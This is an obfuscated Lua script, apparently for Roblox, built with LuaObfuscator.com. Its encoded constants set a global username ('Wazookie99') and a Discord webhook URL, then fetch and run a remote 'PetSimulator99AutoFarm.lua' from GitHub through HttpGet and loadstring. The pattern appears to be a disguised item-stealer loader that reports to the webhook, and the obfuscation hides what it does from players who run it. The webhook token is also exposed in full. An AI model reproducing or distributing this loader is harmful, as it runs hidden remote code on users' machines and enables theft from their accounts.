--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v30,16));if v19 then local v115=v5(v85,v19);v19=nil;return v115;else return v85;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v86=0 -0 ;local v87;while true do if (v86==(0 -0)) then v87=(v31/((3 -1)^(v32-(1638 -(1523 + 114)))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + ((512 + 57) -((523 -156) + 201)))) ;return v87-(v87%(928 -(214 + 713))) ;end end else local v88=0;local v89;while true do if (v88==0) then v89=(1 + (1066 -(68 + 997)))^(v32-(1 + 0)) ;return (((v31%(v89 + v89))>=v89) and 1) or ((2147 -(226 + 1044)) -(282 + 595)) ;end end end end local function v21() local v34=0 -(957 -(892 + 65)) ;local v35;while true do if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (118 -(32 + 85)) ;v34=1 + 0 ;end if ((1 + 0)==v34) then return v35;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (4 -2) ;return (v37 * (472 -216)) + v36 ;end local function v23() local v38=0 -(0 + 0) ;local v39;local v40;local v41;local v42;while true do if (v38==(1 -0)) then return (v42 * (16777566 -(87 + 263))) + (v41 * ((87440 -20952) -(802 + 150))) + (v40 * (689 -433)) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + ((1370 -(1069 + 118)) -(67 + 113)) );v18=v18 + 3 + 1 ;v38=2 -1 ;end end end local function v24() local v43=(0 + 0) -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(1 -(0 + 0))) then v46=1 + 0 ;v47=(v20(v45,1 -0 ,20) * ((2 + 0)^(823 -(368 + 423)))) + v44 ;v43=2;end if (v43==2) then v48=v20(v45,21,97 -66 );v49=((v20(v45,50 -(10 + 8) )==(3 -2)) and  -(443 -(416 + 26))) or ((888 -(261 + 624)) -(3 -1)) ;v43=2 + 1 ;end if (v43==(4 -1)) then if (v48==((1518 -(1020 + 60)) -(145 + 293))) then if (v47==0) then return v49 * (430 -((1467 -(630 + 793)) + 386)) ;else local v116=1486 -(998 + 488) ;while true do if (v116==(0 + 0)) then v48=1 + 0 ;v46=0 -0 ;break;end end end elseif (v48==(2819 -((951 -750) + 225 + 346))) then return ((v47==(1138 -(116 + 1022))) and (v49 * ((4 -3)/(0 + 0)))) or (v49 * NaN) ;end return v8(v49,v48-((12856 -9122) -2711) ) * (v46 + (v47/((7 -5)^(911 -(814 + (1792 -(760 + 987))))))) ;end if (v43==(0 -0)) then v44=v23();v45=v23();v43=1;end end end local function v25(v50) local v51;if  not v50 then v50=v23();if (v50==(1913 -(1789 + 124))) then return "";end end v51=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;local v52={};for v67=767 -(745 + 21) , #v51 do v52[v67]=v2(v1(v3(v51,v67,v67)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();while true do if (v53==(1002 -(241 + 761))) then v54=(function() return function(v105,v106,v107) local v108=(function() return 0;end)();while true do if (v108==0) then local v117=(function() return 0 + 0 ;end)();local v118=(function() return;end)();while true do if (v117==(0 + 0)) then v118=(function() return 0;end)();while true do if (v118==0) then v105[v106-#"|" ]=(function() return v107();end)();return v105,v106,v107;end end break;end end end end end;end)();v55=(function() return {};end)();v56=(function() return {};end)();v57=(function() return {};end)();v53=(function() return 3 -2 ;end)();end if (v53~=(6 -4)) then else v58[ #"91("]=(function() return v21();end)();for v93= #"<",v23() do local v94=(function() return v21();end)();if (v20(v94, #"|", #" ")==0) then local v111=(function() return 0;end)();local v112=(function() return;end)();local v113=(function() return;end)();local v114=(function() return;end)();while true do if (v111~=2) then else if (v20(v113, #" ", #":")~= #"[") then else v114[376 -(123 + 251) ]=(function() return v60[v114[2]];end)();end if (v20(v113,9 -7 ,2)~= #"~") then else v114[ #"19("]=(function() return v60[v114[ #"asd"]];end)();end v111=(function() return 3;end)();end if (v111~=(698 -(208 + 490))) then else v112=(function() return v20(v94,1 + 1 , #"gha");end)();v113=(function() return v20(v94, #"http",6);end)();v111=(function() return 1 + 0 ;end)();end if (v111==(837 -(660 + 176))) then v114=(function() return {v22(),v22(),nil,nil};end)();if (v112==(0 + 0)) then local v123=(function() return 202 -(14 + 188) ;end)();while true do if ((675 -(534 + 141))==v123) then v114[ #"91("]=(function() return v22();end)();v114[ #"0836"]=(function() return v22();end)();break;end end elseif (v112== #"{") then v114[ #"xxx"]=(function() return v23();end)();elseif (v112==(1 + 1)) then v114[ #"nil"]=(function() return v23() -(2^(15 + 1)) ;end)();elseif (v112== #"-19") then local v173=(function() return 0;end)();local v174=(function() return;end)();while true do if (v173==(0 + 0)) then v174=(function() return 0 -0 ;end)();while true do if (v174~=0) then else v114[ #"xnx"]=(function() return v23() -(2^(25 -9)) ;end)();v114[ #".dev"]=(function() return v22();end)();break;end end break;end end end v111=(function() return 5 -3 ;end)();end if (v111~=3) then else if (v20(v113, #"asd", #"19(")~= #"/") then else v114[ #"0313"]=(function() return v60[v114[ #"0313"]];end)();end v55[v93]=(function() return v114;end)();break;end end end end for v95= #":",v23() do v56,v95,v28=(function() return v54(v56,v95,v28);end)();end return v58;end if (1~=v53) then else v58=(function() return {v55,v56,nil,v57};end)();v59=(function() return v23();end)();v60=(function() return {};end)();for v96= #"]",v59 do local v97=(function() return 0;end)();local v98=(function() return;end)();local v99=(function() return;end)();local v100=(function() return;end)();while true do if (v97~=0) then else v98=(function() return 0;end)();v99=(function() return nil;end)();v97=(function() return 1 + 0 ;end)();end if (v97==(1 + 0)) then v100=(function() return nil;end)();while true do if (1~=v98) then else if (v99== #"}") then v100=(function() return v21()~=0 ;end)();elseif (v99==(398 -(115 + 281))) then v100=(function() return v24();end)();elseif (v99== #"nil") then v100=(function() return v25();end)();end v60[v96]=(function() return v100;end)();break;end if ((0 -0)==v98) then v99=(function() return v21();end)();v100=(function() return nil;end)();v98=(function() return 1 + 0 ;end)();end end break;end end end v53=(function() return 4 -2 ;end)();end end end local function v29(v61,v62,v63) local v64=v61[3 -2 ];local v65=v61[869 -((1406 -(564 + 292)) + 317) ];local v66=v61[3 -0 ];return function(...) local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1 -0 ;local v74= -(2 -1);local v75={};local v76={...};local v77=v12("#",...) -(1666 -((1186 -(42 + 174)) + 695)) ;local v78={};local v79={};for v90=0 -0 ,v77 do if (v90>=v71) then v75[v90-v71 ]=v76[v90 + (1991 -(438 + 144 + 1167 + 241)) ];else v79[v90]=v76[v90 + (3 -2) ];end end local v80=(v77-v71) + ((2 -1) -0) ;local v81;local v82;while true do local v91=0 -0 ;while true do if ((v91==(1825 -(1195 + 629))) or (443>=4015)) then if ((3382>166) and (v82<=(19 -10))) then if (v82<=(5 -1)) then if (v82<=(242 -(187 + 54))) then if ((v82==(780 -(162 + 618))) or (280==3059)) then v73=v81[3 + 0 ];else v79[v81[2 -(304 -(244 + 60)) ]]=v63[v81[2 + 1 ]];end elseif (v82<=(3 -1)) then local v129=v81[2 -0 ];local v130=v79[v81[1 + 0 + 2 ]];v79[v129 + (1637 -(1373 + (739 -(41 + 435)))) ]=v130;v79[v129]=v130[v81[69 -(30 + 35) ]];elseif ((1881>1293) and (v82==(1003 -(451 + (1550 -(938 + 63)))))) then do return;end elseif (v79[v81[2]]==v81[2 + 1 + 1 ]) then v73=v73 + (1 -0) ;else v73=v81[4 -1 ];end elseif (v82<=6) then if (v82==(1389 -(746 + (2142 -(363 + 1141))))) then v79[v81[1 + (1581 -(1183 + 397)) ]]();else local v134=0 -0 ;local v135;local v136;local v137;local v138;while true do if (v134==(0 + (0 -0))) then v135=v81[415 -(15 + 398) ];v136,v137=v72(v79[v135](v13(v79,v135 + (342 -(218 + 123)) ,v81[11 -(1621 -(1565 + 48)) ])));v134=(978 + 604) -(1535 + 46) ;end if (v134==(1 + 0)) then v74=(v137 + v135) -(1 + 0) ;v138=0 + 0 ;v134=562 -(306 + 254) ;end if (v134==(1 + 1)) then for v176=v135,v74 do local v177=0 -0 ;while true do if (v177==(1467 -(899 + 568))) then v138=v138 + 1 + 0 ;v79[v176]=v136[v138];break;end end end break;end end end elseif (v82<=(14 -7)) then local v139=0 + 0 ;local v140;while true do if ((2357==2357) and (v139==(0 -0))) then v140=v81[605 -(268 + 335) ];v79[v140]=v79[v140](v13(v79,v140 + ((1140 -(782 + 356)) -1) ,v74));break;end end elseif (v82>(298 -(60 + (497 -(176 + 91))))) then v79[v81[4 -2 ]][v81[575 -(426 + 146) ]]=v81[409 -(118 + 287) ];else v73=v81[11 -8 ];end elseif ((123==123) and (v82<=(2 + 12))) then if (v82<=(1467 -(282 + 1174))) then if ((v82==(387 -(142 + 235))) or (1056>=3392)) then v79[v81[2]]=v63[v81[814 -(569 + 242) ]];else v79[v81[5 -3 ]]=v81[(2553 -1573) -(553 + 424) ];end elseif (v82<=(1 + 11)) then local v145=v81[(753 + 273) -((1040 -334) + 318) ];v79[v145]=v79[v145](v13(v79,v145 + (1252 -(539 + 182 + 530)) ,v74));elseif (v82>((3159 -(157 + 1718)) -(945 + 326))) then local v161=v81[2 + 0 + 0 ];local v162=v79[v81[7 -4 ]];v79[v161 + 1 ]=v162;v79[v161]=v162[v81[4 + 0 ]];else do return;end end elseif (v82<=((2691 -(1913 + 62)) -(271 + 429))) then if (v82>(9 + 5 + 1)) then if (v79[v81[2]]==v81[1504 -(1408 + (243 -151)) ]) then v73=v73 + (2 -(1934 -(565 + 1368))) ;else v73=v81[6 -3 ];end else local v147=0 + (0 -0) ;local v148;local v149;local v150;local v151;while true do if ((v147==(1088 -(461 + (2350 -1725)))) or (1081<1075)) then for v178=v148,v74 do v151=v151 + ((4406 -3117) -(993 + 295)) ;v79[v178]=v149[v151];end break;end if (v147==(754 -((1900 -(1477 + 184)) + 514))) then v74=(v150 + v148) -((1019 -(697 + 321)) + 0) ;v151=0 + 0 ;v147=1173 -(418 + (1025 -272)) ;end if ((v147==(0 + (0 -0))) or (1049>=4432)) then v148=v81[1 + 1 ];v149,v150=v72(v79[v148](v13(v79,v148 + 1 + 0 ,v81[1 + 2 ])));v147=1203 -(373 + 829) ;end end end elseif (v82<=(546 -(406 + 123))) then v79[v81[1771 -(1749 + 20) ]][v81[(1 -0) + 2 ]]=v81[4];elseif (v82>(1340 -(1249 + 73))) then v79[v81[1 + 1 ]]();else v79[v81[1147 -(466 + 679) ]]=v81[241 -(64 + 174) ];end v73=v73 + (2 -1) ;break;end if (v91==(0 -0)) then v81=v69[v73];v82=v81[(4382 -2481) -(99 + 7 + 1794) ];v91=1 + 0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0B3Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034D3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50532Q392F6D61696E2F50657453696D756C61746F722Q394175746F4661726D2E6C756103023Q005F4703083Q00757365726E616D65030A3Q0057617A2Q6F6B69652Q3903073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F313332303738333430313436343336393332342F6D6A374D3653304555375A33795F414A69345F713354774E49624643736377492Q38666875505A6D74425A4B69664B4F58684C5052757332636F44552D4879716E636E3000143Q002Q123Q00013Q0026103Q000B000100020004083Q000B0001001201000100033Q001201000200043Q00200E000200020005002Q12000400064Q0006000200044Q000700013Q00022Q00050001000100010004083Q001300010026103Q0001000100010004083Q00010001001201000100073Q003011000100080009001201000100073Q0030110001000A000B002Q123Q00023Q0004083Q000100012Q000D3Q00017Q00",v9(),...);
